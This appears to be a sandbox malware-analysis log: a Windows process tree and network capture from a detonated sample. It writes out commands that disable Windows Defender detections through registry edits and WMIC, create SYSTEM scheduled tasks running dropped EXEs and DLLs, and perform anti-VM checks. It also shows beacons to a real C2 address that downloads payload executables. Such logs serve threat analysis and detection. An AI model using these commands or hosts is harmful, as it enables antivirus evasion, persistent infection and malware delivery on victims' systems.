C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4340
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:5576
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:5636
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:5584
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:5632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:5592
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:2892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:5972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:1100
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:5936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:5472
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "XyyyteIMwZeutaZuw" /SC once /ST 03:05:35 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\FhZPPvs.exe\" GH /yiqudidnn 385118 /S" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3100 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5324
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "XyyyteIMwZeutaZuw"2⤵PID:5432
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:3112
-
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\CotgOgQ.exeC:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\CotgOgQ.exe GH /SvWcdidgG 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:5176 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:5244
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:5000
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:2344
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:1844
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:4280
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:1200
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:5828
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:5408
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:5416
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:6108
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:5548
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:5540
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:2096
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:4960
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:6044
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5112 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:4852
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"2⤵PID:5600
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:4224
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5308
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:5332
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:3956
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:5428 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵PID:876
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\kcXDqX.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5296
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\jgzmjeb.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5976 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6000
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FPieTEPPuEmJrhC"2⤵PID:5172
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FPieTEPPuEmJrhC"2⤵PID:2056
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\snzniaG.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3624 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5112
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\GGaXytC.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:1392 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5828
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\SEacfvq.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3660
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\lANuDZv.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4224 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:2100
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rrqYunoktxOQmCoCX" /SC once /ST 09:38:57 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\skQuQXsK\CrvewHV.dll\",#1 /eetYdidZX 385118" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4340 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:596
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "rrqYunoktxOQmCoCX"2⤵PID:2556
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "XyyyteIMwZeutaZuw"2⤵PID:5296
-
-
C:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\FhZPPvs.exeC:\Windows\Temp\WPGfhLqOzAIwKSwi\CKEIBaXuklpWnmi\FhZPPvs.exe GH /yiqudidnn 385118 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
PID:5788 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵PID:3596
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵PID:1056
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵PID:5540
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵PID:876
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵PID:5272
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵PID:3660
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵PID:6112
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵PID:5948
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵PID:5492
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵PID:5140
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵PID:596
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵PID:5988
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵PID:6000
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵PID:5940
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵PID:2180
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
PID:5744 -
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵PID:5764
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵PID:5592
-
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bbmnnUCIPYyTQrzMQJ"2⤵PID:4552
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:6000
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5964
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:5564
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:520
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1252 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵PID:5612
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\HzvOZz.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:6004
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\BcSeElW.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4912
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "FPieTEPPuEmJrhC"2⤵PID:5600
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "FPieTEPPuEmJrhC"2⤵PID:5300
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\phqMPFN.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3656 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4248
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\jCBbjKQ.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5876
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\uvvouwo.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:5896 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5428
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\wKCalaf.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:3160 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5480
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "XyyyteIMwZeutaZuw"2⤵PID:2948
-
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4524
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\skQuQXsK\CrvewHV.dll",#1 /eetYdidZX 3851181⤵PID:6140
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\skQuQXsK\CrvewHV.dll",#1 /eetYdidZX 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
PID:5688 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "rrqYunoktxOQmCoCX"3⤵PID:3608
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s PcaSvc1⤵PID:5876
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵PID:5496
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k smphost1⤵PID:5880
-
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exeC:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5416
-
C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe1⤵PID:4276
-
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exeC:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5176
-
C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe1⤵PID:6084
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Modifies data under HKEY_USERS
PID:5852
-
C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exeC:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2556
-
C:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exeC:\Users\Admin\AppData\Local\Temp\1000088001\NewB.exe1⤵PID:6120
Network
-
Remote address:193.233.132.56:80RequestPOST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:25:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
-
Remote address:193.233.132.56:80RequestPOST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 158
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:25:42 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:193.233.132.56:80RequestGET /lend/swiiiii.exe HTTP/1.1
Host: 193.233.132.56
ResponseHTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:25:42 GMT
Content-Type: application/octet-stream
Content-Length: 329352
Last-Modified: Sat, 30 Mar 2024 23:24:22 GMT
Connection: keep-alive
ETag: "66089f26-50688"
Accept-Ranges: bytes
-
Remote address:193.233.132.56:80RequestPOST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:25:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:193.233.132.56:80RequestGET /lend/jok.exe HTTP/1.1
Host: 193.233.132.56
ResponseHTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:25:44 GMT
Content-Type: application/octet-stream
Content-Length: 311296
Last-Modified: Mon, 08 Apr 2024 13:25:04 GMT
Connection: keep-alive
ETag: "6613f030-4c000"
Accept-Ranges: bytes
-
Remote address:193.233.132.56:80RequestPOST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:25:45 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:193.233.132.56:80RequestGET /lend/swiiii.exe HTTP/1.1
Host: 193.233.132.56
ResponseHTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:25:45 GMT
Content-Type: application/octet-stream
Content-Length: 162304
Last-Modified: Sat, 06 Apr 2024 02:31:48 GMT
Connection: keep-alive
ETag: "6610b414-27a00"
Accept-Ranges: bytes
-
Remote address:193.233.132.56:80RequestPOST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:25:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:193.233.132.56:80RequestPOST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:25:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:193.233.132.56:80RequestGET /lend/gold.exe HTTP/1.1
Host: 193.233.132.56
ResponseHTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:25:47 GMT
Content-Type: application/octet-stream
Content-Length: 578048
Last-Modified: Fri, 03 May 2024 14:34:59 GMT
Connection: keep-alive
ETag: "6634f613-8d200"
Accept-Ranges: bytes
-
Remote address:193.233.132.56:80RequestPOST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:25:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:193.233.132.56:80RequestGET /lend/alexxxxxxxx.exe HTTP/1.1
Host: 193.233.132.56
ResponseHTTP/1.1 200 OK
Date: Sun, 05 May 2024 22:25:50 GMT
Content-Type: application/octet-stream
Content-Length: 2831872
Last-Modified: Tue, 23 Apr 2024 20:08:15 GMT
Connection: keep-alive
